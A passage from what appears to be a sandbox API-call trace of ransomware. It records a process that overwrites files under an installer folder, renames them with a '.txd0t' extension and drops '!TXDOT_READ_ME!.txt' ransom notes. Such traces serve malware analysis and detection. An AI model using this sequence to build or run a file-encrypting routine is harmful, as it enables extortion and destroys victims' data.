(lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0086.190] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=80738) returned 1 [0086.190] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.191] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0086.192] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec29e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.192] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x13b60, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x13b60, lpOverlapped=0x0) returned 1 [0086.195] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffec4a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.195] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x13b60, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x13b60, lpOverlapped=0x0) returned 1 [0086.195] FlushFileBuffers (hFile=0x47c) returned 1 [0086.435] GetProcessHeap () returned 0xe30000 [0086.435] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0086.435] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" [0086.435] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned="LocalizedData.xml" [0086.435] StrCpyW (in: psz1=0xe9d78e, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.435] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1046\\!TXDOT_READ_ME!.txt") returned 1 [0086.436] GetProcessHeap () returned 0xe30000 [0086.436] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.436] CloseHandle (hObject=0x47c) returned 1 [0086.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.txd0t")) returned 1 [0086.436] SetEvent (hEvent=0x414) returned 1 [0086.436] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0086.445] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" [0086.446] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t" [0086.446] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t") returned 0 [0086.446] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.446] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0086.446] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=5827) returned 1 [0086.446] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.446] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0086.459] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe73d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.459] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x16c0, lpOverlapped=0x0) returned 1 [0086.477] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe940, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.477] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x16c0, lpOverlapped=0x0) returned 1 [0086.477] FlushFileBuffers (hFile=0x460) returned 1 [0086.662] GetProcessHeap () returned 0xe30000 [0086.662] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9b648 [0086.662] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" [0086.662] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned="eula.rtf" [0086.662] StrCpyW (in: psz1=0xe9b686, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.662] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt") returned 1 [0086.666] GetProcessHeap () returned 0xe30000 [0086.666] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0086.666] CloseHandle (hObject=0x460) returned 1 [0086.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t")) returned 1 [0086.667] SetEvent (hEvent=0x414) returned 1 [0086.667] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0086.668] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" [0086.668] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t" [0086.669] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t") returned 0 [0086.669] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf", dwFileAttributes=0x80) returned 1 [0086.669] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0086.669] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=6309) returned 1 [0086.669] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.669] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0086.720] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe55b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.720] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x18a0, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x18a0, lpOverlapped=0x0) returned 1 [0086.723] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffe760, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.723] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x18a0, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x18a0, lpOverlapped=0x0) returned 1 [0086.724] FlushFileBuffers (hFile=0x460) returned 1 [0086.772] GetProcessHeap () returned 0xe30000 [0086.772] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe41328 [0086.773] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" [0086.773] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned="eula.rtf" [0086.773] StrCpyW (in: psz1=0xe41366, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.773] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt") returned 0 [0086.773] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt" (normalized: "c:\\588bce7c90097ed212\\3076\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0086.775] WriteFile (in: hFile=0x478, lpBuffer=0x53ef7c4*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x53ef7c4*, lpNumberOfBytesWritten=0x53ef7c0*=0x2, lpOverlapped=0x0) returned 1 [0086.780] FlushFileBuffers (hFile=0x478) returned 1 [0086.788] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x53ef7c0, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x53ef7c0*=0x7f0, lpOverlapped=0x0) returned 1 [0086.821] FlushFileBuffers (hFile=0x478) returned 1 [0086.829] CloseHandle (hObject=0x478) returned 1 [0086.829] GetProcessHeap () returned 0xe30000 [0086.829] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0086.829] CloseHandle (hObject=0x460) returned 1 [0086.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t")) returned 1 [0086.834] SetEvent (hEvent=0x414) returned 1 [0086.834] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0086.836] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" [0086.836] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t" [0086.836] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t") returned 0 [0086.836] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml", dwFileAttributes=0x80) returned 1 [0086.836] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0086.836] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=201796) returned 1 [0086.837] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.837] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0086.859] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffce9bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.859] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x31440, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x31440, lpOverlapped=0x0) returned 1 [0086.868] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffcebc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.868] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x31440, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x31440, lpOverlapped=0x0) returned 1 [0086.871] FlushFileBuffers (hFile=0x464) returned 1 [0086.880] GetProcessHeap () returned 0xe30000 [0086.880] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2d00 [0086.880] StrCpyW (in: psz1=0xed2d00, psz2="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" [0086.880] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml") returned="Parameterinfo.xml" [0086.880] StrCpyW (in: psz1=0xed2d42, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.881] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Client\\!TXDOT_READ_ME!.txt") returned 1 [0086.882] GetProcessHeap () returned 0xe30000 [0086.882] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2d00 | out: hHeap=0xe30000) returned 1 [0086.882] CloseHandle (hObject=0x464) returned 1 [0086.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Client\\Parameterinfo.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\client\\parameterinfo.xml.txd0t")) returned 1 [0086.883] SetEvent (hEvent=0x414) returned 1 [0086.883] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0086.901] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" [0086.902] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t" [0086.902] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t") returned 0 [0086.902] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", dwFileAttributes=0x80) returned 1 [0086.902] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0086.902] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=39050) returned 1 [0086.902] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.902] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0086.909] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff6576, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.909] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x9880, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x9880, lpOverlapped=0x0) returned 1 [0086.919] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff6780, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.919] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x9880, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x9880, lpOverlapped=0x0) returned 1 [0086.919] FlushFileBuffers (hFile=0x474) returned 1 [0086.960] GetProcessHeap () returned 0xe30000 [0086.960] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0086.960] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" [0086.960] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned="UiInfo.xml" [0086.960] StrCpyW (in: psz1=0xe9d796, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0086.960] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt") returned 1 [0086.963] GetProcessHeap () returned 0xe30000 [0086.963] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0086.963] CloseHandle (hObject=0x474) returned 1 [0086.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml.txd0t")) returned 1 [0087.006] SetEvent (hEvent=0x414) returned 1 [0087.006] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.030] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" [0087.030] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t" [0087.030] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t") returned 0 [0087.030] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi", dwFileAttributes=0x80) returned 1 [0087.031] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.031] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=1901056) returned 1 [0087.031] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.031] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.034] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffe2fc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.034] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x100000, lpOverlapped=0x0) returned 1 [0087.073] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.073] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x100000, lpOverlapped=0x0) returned 1 [0087.282] FlushFileBuffers (hFile=0x474) returned 1 [0087.648] GetProcessHeap () returned 0xe30000 [0087.648] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x100) returned 0xecfcd8 [0087.648] StrCpyW (in: psz1=0xecfcd8, psz2="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" [0087.648] PathFindFileNameW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned="netfx_Core_x64.msi" [0087.648] StrCpyW (in: psz1=0xecfd0c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.648] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\!TXDOT_READ_ME!.txt") returned 1 [0087.648] GetProcessHeap () returned 0xe30000 [0087.648] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfcd8 | out: hHeap=0xe30000) returned 1 [0087.648] CloseHandle (hObject=0x474) returned 1 [0087.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi.txd0t" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.txd0t")) returned 1 [0087.649] SetEvent (hEvent=0x414) returned 1 [0087.649] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0087.650] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" [0087.650] StrCatW (in: psz1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml", psz2=".txd0t" | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t") returned="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t" [0087.650] PathFileExistsW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.txd0t") returned 0 [0087.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml", dwFileAttributes=0x80) returned 1 [0087.651] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.651] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=272046) returned 1 [0087.651] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.651] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0087.665] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffbd752, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.665] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, 